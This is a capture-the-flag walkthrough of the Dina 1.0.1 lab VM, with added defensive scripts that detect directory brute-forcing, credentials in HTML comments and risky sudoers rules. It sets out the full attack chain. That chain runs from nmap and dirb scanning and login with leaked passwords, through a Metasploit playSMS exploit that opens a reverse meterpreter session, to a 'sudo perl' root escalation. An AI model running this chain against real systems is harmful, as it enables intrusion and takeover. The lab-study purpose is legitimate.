CTF - Dina: 1.0.1 walkthrough

    
Lab Environment:

Attacker's Machine:
 Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux

Vulnerable Machine: Dina: 1.0.1


Scanning phase
  1. route -n (to find the gateway), i.e. 172.16.60.2
  2. arp-scan --local (to list the devices connected to the local network)
  3. Vulnerable machine IP: 172.16.60.154

    


    Using nmap to scan the IP: nmap -sS -sC -sV 172.16.60.154
  1. We got one open port, i.e. 80, with an HTTP service running.


Since port 80 is open and an HTTP service is running, we can open the IP in a browser.
 

Another nmap invocation to check for known vulnerabilities, if any: nmap --script vuln 172.16.60.154

Now going further, using dirb to scan for directories: dirb http://172.16.60.154


Some results were obtained after using dirb.
  1. Opened http://172.16.60.154/robots.txt and found something interesting.
  2. I got a few directories listed.
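From the defender's side, a dirb run like the one above is loud: one source address requesting many distinct paths in a few seconds and getting mostly 404s. The script below is an added example (not part of the original walkthrough) that reads Apache combined-format access log lines and flags that pattern. The log lines are constructed for illustration; the scanner address matches the attacker box in this lab, the paths are made up.

```python
"""Detect dirb-style directory brute-forcing in Apache combined-format logs.

Added example, not part of the original walkthrough. It assumes the target
serves a standard combined access log; SAMPLE_LOG below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip ident user [ts] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one host hammering non-existent paths, one normal visitor.
SAMPLE_LOG = """\
172.16.60.52 - - [08/Nov/2017:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:02 +0000] "GET /admin HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:02 +0000] "GET /backup HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:03 +0000] "GET /cgi-bin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:03 +0000] "GET /test HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:04 +0000] "GET /old HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:04 +0000] "GET /tmp HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:05 +0000] "GET /private HTTP/1.1" 404 209 "-" "Mozilla/5.0"
172.16.60.52 - - [08/Nov/2017:10:00:05 +0000] "GET /secure/ HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
172.16.60.10 - - [08/Nov/2017:10:01:10 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
172.16.60.10 - - [08/Nov/2017:10:01:12 +0000] "GET /contact HTTP/1.1" 200 812 "-" "Mozilla/5.0"
172.16.60.10 - - [08/Nov/2017:10:01:15 +0000] "GET /contatc HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def max_in_window(times, window_seconds):
    """Largest number of events that fall inside any span of window_seconds."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(lines, window_seconds=60, min_404=5, min_ratio=0.6):
    """Flag source IPs with a burst of 404s that dominate their traffic."""
    per_ip = defaultdict(lambda: {"total": 0, "not_found": [], "paths": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, status = parsed
        rec = per_ip[ip]
        rec["total"] += 1
        rec["paths"].add(path)
        if status == 404:
            rec["not_found"].append(ts)
    findings = []
    for ip, rec in per_ip.items():
        burst = max_in_window(rec["not_found"], window_seconds)
        ratio = len(rec["not_found"]) / rec["total"]
        if burst >= min_404 and ratio >= min_ratio:
            findings.append({"ip": ip, "burst_404": burst, "total": rec["total"],
                             "distinct_paths": len(rec["paths"]), "ratio": round(ratio, 2)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"possible directory brute force from {f['ip']}: "
              f"{f['burst_404']} x 404 in one window, {f['distinct_paths']} distinct paths")
```

In practice you would feed `analyze()` the lines of the real access log and tune the window and thresholds to the site's normal 404 rate; the single typo-driven 404 from the benign visitor stays below both thresholds, while the scanner trips them within a few seconds.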
 

After checking the directories, I got to know that there could be something in http://172.16.60.154/nothing.



NOT FOUND, go back. But this is an HTML page, so we can view the page source, and it revealed
something really interesting.
I got a password list as:
#my secret pass
freedom
password
Helloworld
diana
iloveroot
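The list above was sitting in an HTML comment, which the browser hides but the page source shows to anyone. A simple check for this class of leak is to pull every comment out of the served pages and flag the ones that talk about passwords or secrets. The script below is an added example, not part of the original walkthrough; the sample HTML is constructed, with the first comment repeating the list from the page source above and the other two invented to show a hit and a miss.

```python
"""Flag credentials left in HTML comments, the kind of leak found at /nothing.

Added example, not part of the original walkthrough. SAMPLE_HTML is constructed.
"""
import re
from html.parser import HTMLParser

# Words that suggest a comment is talking about credentials.
HINT_RE = re.compile(r"\b(pass(word|wd)?|pwd|secret|credentials?|login|token)\b", re.I)


class CommentCollector(HTMLParser):
    """Collect the text of every <!-- ... --> comment in a document."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data)


def find_leaked_secrets(html):
    """Return one finding per suspicious comment: the hint line and candidate values."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for comment in parser.comments:
        lines = [l.strip() for l in comment.splitlines() if l.strip()]
        hint_idx = next((i for i, l in enumerate(lines) if HINT_RE.search(l)), None)
        if hint_idx is None:
            continue
        hint = lines[hint_idx]
        # Every other line of the comment is treated as a candidate value...
        candidates = [l for i, l in enumerate(lines) if i != hint_idx]
        # ...and so is anything after ':' or '=' on the hint line itself.
        m = re.search(r"[:=]\s*(\S+)", hint)
        if m:
            candidates.insert(0, m.group(1))
        findings.append({"hint": hint, "candidates": candidates})
    return findings


# Constructed sample page: the first comment is the list seen in the walkthrough,
# the second is a harmless developer note, the third is an invented one-liner leak.
SAMPLE_HTML = """<html><head><title>NOT FOUND</title></head><body>
<!--
#my secret pass
freedom
password
Helloworld
diana
iloveroot
-->
<p>NOT FOUND, go back</p>
<!-- TODO: move the nav into a template -->
<!-- db password: hunter2 -->
</body></html>"""


if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_HTML):
        print(f"suspicious comment: {f['hint']!r} -> {len(f['candidates'])} candidate value(s)")
```

Run it over the rendered pages of a site (or over the templates in the repository as a pre-deploy check) and treat any hit as something to remove from the page and rotate, since a comment in served HTML is as public as the page itself.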

   
      Opened another URL which dirb had listed, i.e. http://172.16.60.154/secure, and got one zip file named backup.zip.

   

      Downloaded the file and extracted it, and it gave a prompt to enter the password.
It looks like it's an MP3 file, but I still tried to open it in a text editor.
 I further tried the passwords which I got from the source code earlier, and the password is freedom.
      It revealed the username as well as one URL, i.e. /SecreTSMSgatwaylogin

   


   

      On browsing the URL obtained above, I got the login panel of playSMS.

   

      I logged in to the portal using the username which was revealed in that zip file, i.e. backup.zip, and
 the password from the same list that was found in the source code.
      Username - touhid
      Password - diana

       

       As I got to know that the web application is playSMS, I searched for its exploit and found one.

       
      After downloading the file, I renamed it playsmscsv and copied it to metasploit-framework > modules > exploits

      Started msfconsole and searched for playsmscsv.

           

      I got one result named playsmscsv. Further, I ran the command to use the exploit, i.e.
      use exploit/playsmscsv

      Now the exploit is ready to be used. I further explored the parameters needed for the exploit to run by typing options

   

       Provided the parameters which were needed for the exploit, as follows:
  1. set PASSWORD diana
  2. set USERNAME touhid
  3. set LHOST 172.16.60.52
  4. set RHOST 172.16.60.154
  5. set TARGETURI SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login

Now ready to run the exploit by typing exploit, and we got the meterpreter session, and then further
entered into the shell by typing shell


Gained the shell and ran two commands to get access as the root user, then explored the directories further.
  1. python -c 'import pty; pty.spawn("/bin/bash")'
  2. sudo perl -e "exec '/bin/bash'"
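The second command only works because sudo lets the web user run perl as root, and any interpreter or shell granted that way is a root shell. A least-privilege check over /etc/sudoers (and /etc/sudoers.d) catches such rules before they are found by someone else. The script below is an added example, not part of the original walkthrough; the sudoers text is constructed, with the touhid line being a guess at the kind of rule that would make the escalation above work and the other lines invented for contrast. Aliases and #include directives are skipped.

```python
"""Audit sudoers rules that hand a non-root principal a shell-capable program.

Added example, not part of the original walkthrough. SAMPLE_SUDOERS is
constructed; User_Alias/Cmnd_Alias and #include lines are ignored.
"""
import re
from pathlib import PurePosixPath

# Interpreters and shells that can exec an arbitrary command once run as root.
SHELL_CAPABLE = {"sh", "bash", "dash", "zsh", "perl", "python", "python2", "python3", "ruby"}
# Tags that may prefix a command; NOPASSWD/PASSWD flip the password requirement.
TAGS = {"NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "NOEXEC", "EXEC"}

# user  host = (runas) [TAG:] command [args] [, ...]
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$")

# Constructed sample: the touhid line is the guessed rule behind "sudo perl -e ...".
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
# constructed: the kind of rule that lets a user escalate through perl
touhid   ALL=(ALL) NOPASSWD: /usr/bin/perl
backup   ALL=(root) /usr/bin/rsync, NOPASSWD: /bin/systemctl restart nginx
webadmin ALL=(root) NOPASSWD:/usr/bin/python3
"""


def parse_rules(text):
    """Expand each sudoers line into one record per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and #include lines
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False                              # tags persist across the comma list
        for spec in m.group("rest").split(","):
            tokens = spec.split()
            while tokens:
                head, sep, tail = tokens[0].partition(":")
                if not sep or head not in TAGS:
                    break
                tokens.pop(0)
                if tail:                              # "NOPASSWD:/bin/cmd" written without a space
                    tokens.insert(0, tail)
                if head == "NOPASSWD":
                    nopasswd = True
                elif head == "PASSWD":
                    nopasswd = False
            if not tokens:
                continue
            rules.append({"user": m.group("who"), "runas": m.group("runas") or "root",
                          "nopasswd": nopasswd, "command": tokens[0], "args": tokens[1:]})
    return rules


def audit(text):
    """Return the rules that let a non-root principal reach a root shell."""
    findings = []
    for rule in parse_rules(text):
        if rule["user"] == "root":
            continue
        cmd = rule["command"]
        name = PurePosixPath(cmd).name
        if cmd == "ALL":
            reason = "may run any command"
        elif name in SHELL_CAPABLE:
            reason = f"{name} can exec an arbitrary shell"
        elif "*" in cmd:
            reason = "wildcard in command path"
        else:
            continue
        findings.append({**rule, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        flag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['user']}: {f['command']} as {f['runas']} ({flag}) - {f['reason']}")
```

Note that the password requirement does not change the verdict: whoever holds the account already knows its password, so a rule granting perl or python as root is a root grant either way. The rsync and systemctl rules pass this check only because they are not in the interpreter list; a fuller audit would also review what each listed binary can be coaxed into doing.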


And finally got the flag in the root directory.




